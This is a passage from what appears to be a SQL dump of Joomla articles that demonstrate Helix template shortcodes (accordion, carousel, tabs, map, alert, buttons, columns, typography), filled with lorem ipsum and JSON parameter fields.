00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,9,'','',1,359,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(3,41,'Accordion','sc-accordion','','<p>[accordion id=\"sc-accordion\"] [accordion_item title=\'Item 1\']Lorem ipsum dolor sit amet, consectetur adipiscing elit. Proin ornare consectetur sodales. Nulla luctus cursus mauris at dapibus. Cras ac felis et neque consequat elementum a eget turpis. Aliquam erat volutpat. Integer feugiat sem eu ligula vulputate consequat. Nulla facilisi. Cras vel elit lectus, at fringilla lorem.[/accordion_item] [accordion_item title=\'Item 2\']consectetur adipiscing elit. Proin ornare consectetur sodales. Nulla luctus cursus mauris at dapibus. Cras ac felis et neque consequat elementum a eget turpis. Aliquam erat volutpat. Integer feugiat sem eu ligula vulputate consequat. Nulla facilisi. Cras vel elit lectus, at fringilla lorem.[/accordion_item] [accordion_item title=\'Item 3\'] Proin ornare consectetur sodales. Nulla luctus cursus mauris at dapibus. Cras ac felis et neque consequat elementum a eget turpis. Aliquam erat volutpat. Integer feugiat sem eu ligula vulputate consequat. Nulla facilisi. Cras vel elit lectus, at fringilla lorem.[/accordion_item] [/accordion]</p>\r\n<h3>Get the code</h3>\r\n<pre>[[accordion] <br />    [accordion_item title=\'ITEM_TITLE\']ADD_CONTENT_HERE[/accordion_item]<br />    [accordion_item title=\'ITEM_TITLE\']ADD_CONTENT_HERE[/accordion_item] <br />    [accordion_item title=\'ITEM_TITLE\']ADD_CONTENT_HERE[/accordion_item]<br />[/accordion]]</pre>','',-2,0,0,11,'2013-01-31 08:07:29',135,'','2013-02-04 09:56:46',439,0,'0000-00-00 00:00:00','2013-01-31 08:07:29','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',11,0,9,'','',1,132,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(4,42,'Carousel','sc-carousel','','<p>[carousel][carousel_item]<img src=\"images/helix/carousel1.png\" border=\"0\" alt=\"\" width=\"1500\" height=\"550\" style=\"border: 0;\" /> [caption] Powerful templates framework to develop Joomla base website faster! [/caption] [/carousel_item] [carousel_item] <img src=\"images/helix/carousel2.png\" border=\"0\" alt=\"\" width=\"1500\" height=\"550\" style=\"border: 0;\" /> [caption] Powerful templates framework to develop Joomla base website faster! [/caption] [/carousel_item] [carousel_item] <img src=\"images/helix/carousel3.png\" border=\"0\" alt=\"\" width=\"1500\" height=\"550\" style=\"border: 0;\" />[caption] Powerful templates framework to develop Joomla base website faster! [/caption] [/carousel_item] [/carousel]</p>\r\n<h3>Get the code</h3>\r\n<pre>[[carousel]\r\n[carousel_item]add image here [caption]Powerful templates framework to develop Joomla base website faster![/caption][/carousel_item]\r\n[/carousel]]</pre>','',-2,0,0,11,'2013-01-31 08:39:47',135,'','2013-08-20 07:01:15',960,0,'0000-00-00 00:00:00','2013-01-31 08:39:47','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',23,0,8,'','',1,110,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(5,43,'Tab','tab','','<p>[row]</p>\r\n<p>[col class=\"span6\"]</p>\r\n<p>[tab id=\"tab1\" class=\"tabbale\" button=\"nav-tabs\"] [tab_item title=\"Tab1\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Proin ornare consectetur sodales. Nulla luctus cursus mauris at dapibus. Cras ac felis et neque consequat elementum a eget turpis. Aliquam erat volutpat. Integer feugiat sem eu ligula vulputate consequat. Nulla facilisi. Cras vel elit lectus, at fringilla lorem.[/tab_item] [tab_item title=\"Tab2\"]consectetur adipiscing elit. Proin ornare consectetur sodales. Nulla luctus cursus mauris at dapibus. Cras ac felis et neque consequat elementum a eget turpis. Aliquam erat volutpat. Integer feugiat sem eu ligula vulputate consequat. Nulla facilisi. Cras vel elit lectus, at fringilla lorem.[/tab_item] [tab_item title=\"Tab3\"]consectetur adipiscing elit. Proin ornare consectetur sodales. Nulla luctus cursus mauris at dapibus. Cras ac felis et neque consequat elementum a eget turpis. Aliquam erat volutpat. Integer feugiat sem eu ligula vulputate consequat. Nulla facilisi. Cras vel elit lectus, at fringilla lorem.[/tab_item][/tab]</p>\r\n<p>[/col]</p>\r\n<p>[col class=\"span6\"]</p>\r\n<p>[tab id=\"tab2\" class=\"tabbale\" button=\"nav-pills\"] [tab_item title=\"Tab1\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Proin ornare consectetur sodales. Nulla luctus cursus mauris at dapibus. Cras ac felis et neque consequat elementum a eget turpis. Aliquam erat volutpat. Integer feugiat sem eu ligula vulputate consequat. Nulla facilisi. Cras vel elit lectus, at fringilla lorem.[/tab_item] [tab_item title=\"Tab2\"]consectetur adipiscing elit. Proin ornare consectetur sodales. Nulla luctus cursus mauris at dapibus. Cras ac felis et neque consequat elementum a eget turpis. Aliquam erat volutpat. Integer feugiat sem eu ligula vulputate consequat. Nulla facilisi. Cras vel elit lectus, at fringilla lorem.[/tab_item] [tab_item title=\"Tab3\"]consectetur adipiscing elit. Proin ornare consectetur sodales. Nulla luctus cursus mauris at dapibus. Cras ac felis et neque consequat elementum a eget turpis. Aliquam erat volutpat. Integer feugiat sem eu ligula vulputate consequat. Nulla facilisi. Cras vel elit lectus, at fringilla lorem.[/tab_item][/tab]</p>\r\n<p>[/col]</p>\r\n<p>[/row]</p>\r\n<h3>Get the code</h3>\r\n<pre>[[tab] \r\n[tab_item title=\"ITEM_TITLE\"]ADD_CONTENT_HERE[/tab_item ]\r\n[tab_item title=\"ITEM_TITLE\"]ADD_CONTENT_HERE[/tab_item ] \r\n[tab_item title=\"ITEM_TITLE\"]ADD_CONTENT_HERE[/tab_item ]\r\n[/tab]]\r\n</pre>','',-2,0,0,11,'2013-01-31 08:51:31',135,'','2013-02-04 07:14:50',439,0,'0000-00-00 00:00:00','2013-01-31 08:51:31','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',9,0,7,'','',1,180,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(6,44,'Map','sc-map','','<p>[spmap lat=\"23.743193\" lng=\"90.388281\" zoom=\"8\" maptype=\"ROADMAP\"]</p>\r\n<h3>Get the code</h3>\r\n<pre>[[spmap lat=\"LATITUDE\" lng=\"LONGITUDE\" zoom=\"VALUE 1 to 10\"]]</pre>','',1,0,0,11,'2013-01-31 09:06:35',135,'','2013-06-19 09:19:42',960,0,'0000-00-00 00:00:00','2013-01-31 09:06:35','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',9,0,6,'','',1,56,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(7,45,'Testimonial ','testimonial','','<p>[testimonial name=\"John Doe\" email=\"jakirhasaneng@gmail.com\" company=\"joomshaper\" designation=\"Developer\"]Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum venenatis, felis a semper mollis, mauris mi suscipit dui, non laoreet diam enim et turpis. Sed imperdiet ultrices felis, at ultricies tellus consequat a. Proin condimentum porttitor eros, vitae facilisis sapien rhoncus vitae. Aliquam dapibus elit non metus posuere blandit. Phasellus a aliquam urna. Aliquam ac massa tellus, a semper odio. In hac habitasse platea dictumst. Integer tincidunt, nisi quis congue consectetur, lacus augue scelerisque enim, eu vehicula neque tortor ac risus. Nunc mollis interdum iaculis. [/testimonial]</p>\r\n<h3>Get the code</h3>\r\n<pre>[[testimonial name=\"AUTHOR_NAME\" email=\"AUTHOR_EMAIL\" company=\"AUTHOR_COMPANY\" designation=\"AUTHOR_DESIGNATION\"]ADD_CONTENT_HERE[/testimonial]]</pre>','',-2,0,0,11,'2013-01-31 09:09:00',135,'','2013-01-31 09:49:51',439,0,'0000-00-00 00:00:00','2013-01-31 09:09:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',8,0,5,'','',1,46,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(8,46,'Alert','sc-alert','','<p>[alert type=\"alert\"]</p>\r\n<h4>Warning!</h4>\r\n<p>Best check yo self, you\'re not looking too good. Nulla vitae elit libero, a pharetra augue. [/alert] [alert type=\"error\" style=\"width:85%\"]</p>\r\n<h4>Error or danger!</h4>\r\n<p>Oh snap! Change a few things up and try submitting again.[/alert] [alert type=\"success\" style=\"width:75%\"]</p>\r\n<h4>success!</h4>\r\n<p>Well done! You successfully read this important alert message. [/alert] [alert type=\"info\" style=\"width:65%\"]</p>\r\n<h4>Information!</h4>\r\n<p>Heads up! This alert needs your attention, but it\'s not super important. [/alert]</p>','',-2,0,0,11,'2013-01-31 09:13:46',135,'','2013-06-19 09:22:20',960,0,'0000-00-00 00:00:00','2013-01-31 09:13:46','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,0,4,'','',1,104,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(9,47,'Button','sc-button','','<p>[row] [col class=\"span6\"] [button type=\"default\" size=\"\" link=\"#\"]Default[/button]</p>\r\n<p>[button type=\"primary\" size=\"\" link=\"#\"]Primary[/button]</p>\r\n<p>[button type=\"info\" size=\"\" link=\"#\"]Info[/button]</p>\r\n<p>[button type=\"success\" size=\"\" link=\"#\"]Success[/button]</p>\r\n<p>[button type=\"warning\" size=\"\" link=\"#\"]Warning[/button]</p>\r\n<p>[button type=\"danger\" size=\"\" link=\"#\"]danger[/button]</p>\r\n<p>[button type=\"inverse\" size=\"\" link=\"#\"]Inverse[/button]</p>\r\n<p>[button type=\"block btn-primary\" size=\"large\" link=\"#\"]Block level button[/button] [/col] [col class=\"span6\"] [button type=\"default\" size=\"large\" link=\"#\"]Large button[/button]</p>\r\n<p>[button type=\"primary\" size=\"large\" link=\"#\"]Large button[/button]</p>\r\n<p>[button type=\"default\" size=\"\" link=\"#\"]Default button[/button]</p>\r\n<p>[button type=\"primary\" size=\"\" link=\"#\"]Default button[/button]</p>\r\n<p>[button type=\"default\" size=\"small\" link=\"#\"]Small button[/button]</p>\r\n<p>[button type=\"primary\" size=\"small\" link=\"#\"]Small button[/button]</p>\r\n<p>[button type=\"default\" size=\"mini\" link=\"#\"]Mini button[/button]</p>\r\n<p>[button type=\"primary\" size=\"mini\" link=\"#\"]Mini button[/button] [/col] [/row]</p>\r\n<h3>Get the code</h3>\r\n<pre>[[button type=\"BUTTON_TYPE\"]...[/button]]\r\n</pre>','',-2,0,0,11,'2013-01-31 09:16:06',135,'','2013-01-31 09:25:55',439,0,'0000-00-00 00:00:00','2013-01-31 09:16:06','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,0,3,'','',1,59,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(10,48,'Icon','sc-icon','','<p>[fontawesome_icons]</p>','',-2,0,0,11,'2013-01-31 09:26:14',135,'','2013-10-08 09:58:54',135,0,'0000-00-00 00:00:00','2013-01-31 09:26:14','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',16,0,2,'','',1,111,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(11,49,'Column','sc-column','','<p>[row class=\"show-grid\"] [col class=\"span4\"] Cras justo odio, dapibus ac facilisis in, egestas eget quam. Donec id elit non mi porta gravida at eget metus. Nullam id dolor id nibh ultricies vehicula ut id.[/col] [col class=\"span4\"] Cras justo odio, dapibus ac facilisis in, egestas eget quam. Donec id elit non mi porta gravida at eget metus. Nullam id dolor id nibh ultricies vehicula ut id.[/col] [col class=\"span4\"] Cras justo odio, dapibus ac facilisis in, egestas eget quam. Donec id elit non mi porta gravida at eget metus. Nullam id dolor id nibh ultricies vehicula ut id.[/col] [/row]</p>\r\n<h3>Get the code</h3>\r\n<pre>[[row id=\"ROW_ID\" class=\"ROW_CLASS\"]\r\n[col class=\"span4\"]ADD_CONTENT_HERE[/col]\r\n[col class=\"span4\"]ADD_CONTENT_HERE[/col]\r\n[col class=\"span4\"]ADD_CONTENT_HERE[/col]\r\n[/row]]\r\n</pre>\r\n<p>[row class=\"show-grid\"] [col class=\"span8\"] Cras justo odio, dapibus ac facilisis in, egestas eget quam. Donec id elit non mi porta gravida at eget metus. Nullam id dolor id nibh ultricies vehicula ut id. Cras justo odio, dapibus ac facilisis in, egestas eget quam. Donec id elit non mi porta gravida at eget metus. Nullam id dolor id nibh ultricies vehicula ut id. Nullam id dolor id nibh ultricies vehicula ut id. Donec id elit non mi porta gravida at eget metus.[/col] [col class=\"span4\"] Cras justo odio, dapibus ac facilisis in, egestas eget quam. Donec id elit non mi porta gravida at eget metus. Nullam id dolor id nibh ultricies vehicula ut id.[/col] [/row]</p>\r\n<h3>Get the code</h3>\r\n<pre>[[row id=\"ROW_ID\" class=\"ROW_CLASS\"]\r\n[col class=\"span8\"]ADD_CONTENT_HERE[/col]\r\n[col class=\"span4\"]ADD_CONTENT_HERE[/col]\r\n[/row]]\r\n</pre>','',-2,0,0,11,'2013-01-31 09:32:26',135,'','2013-02-04 07:14:32',439,0,'0000-00-00 00:00:00','2013-01-31 09:32:26','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',10,0,1,'','',1,102,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(12,50,'Powerfull Features','powerfull-features','','<p>[row]</p>\r\n<p>[col class=\"span6\"]</p>\r\n<h4>Joomla 2.5 and 3.0</h4>\r\n<p>Helix - II is available for Joomla 2.5 as well as Joomla 3.0 that means no matter which version of you joomla you like to use for developing your next website.</p>\r\n<p> </p>\r\n<h4>HTML5</h4>\r\n<p>We brought HTML5 in Helix blank template to make elegant, modern and SEO friendly website that would be fully functional &amp; represents awesome typography.</p>\r\n<p> </p>\r\n<h4>Bootstrap</h4>\r\n<p><a href=\"http://getbootstrap.com\" target=\"_blank\">Bootstrap</a> is made upon responsive CSS Designs with less code which enhances the overall look and feel of your website.</p>\r\n<p>[/col]</p>\r\n<p>[col class=\"span6\"]</p>\r\n<h4>Wordpress</h4>\r\n<p>This is really great thing that Helix Framework is available for most popular blogging platform Wordpress besides Joomla with tons of exciting features.  </p>\r\n<p> </p>\r\n<h4>CSS3</h4>\r\n<p>The latest CSS3 technology has been used in Helix Framework - II to make the whole web development process easier and faster with lot of scopes.  </p>\r\n<p> </p>\r\n<h4>Presets</h4>\r\n<p>Presets manager give the flexibilty to change the design of your website without coding by selecting the desire color of your website background, header and footer etc.</p>\r\n<p>[/col]</p>\r\n<p>[/row]</p>','',-2,0,0,10,'2013-01-31 09:34:38',135,'','2013-08-20 07:33:45',960,0,'0000-00-00 00:00:00','2013-01-31 09:34:38','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',52,0,8,'','',1,908,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(13,51,'Article','article','','<ul>\r\n<li>This is a sample <strong>unordered list</strong></li>\r\n</ul>\r\n<ul class=\"arrow\">\r\n<li>ul with class <strong>arrow</strong></li>\r\n</ul>\r\n<ul class=\"arrow-2\">\r\n<li>ul with class <strong>arrow-2</strong></li>\r\n</ul>\r\n<ul class=\"star\">\r\n<li>ul with class <strong>star</strong></li>\r\n</ul>\r\n<ul class=\"rss\">\r\n<li>ul with class <strong>rss</strong></li>\r\n</ul>','',-2,0,0,10,'2013-01-31 11:56:10',135,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2013-01-31 11:56:10','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,7,'','',1,163,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(14,52,'Typography','typgraphy','','<p>[row]</p>\r\n<p>[col class=\"span6\"]</p>\r\n<h1>h1. Heading 1</h1>\r\n<h2>h2. Heading 2</h2>\r\n<h3>h3. Heading 3</h3>\r\n<h4>h4. Heading 4</h4>\r\n<h5>h5. Heading 5</h5>\r\n<h6>h6. Heading 6</h6>\r\n<p>[/col]</p>\r\n<p>[col class=\"span6\"]</p>\r\n<h3>Dropcap</h3>\r\n<p>[dropcap]This is a Magazine Style Drop Cap. Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.[/dropcap]</p>\r\n<pre>[[dropcap]Dropcap 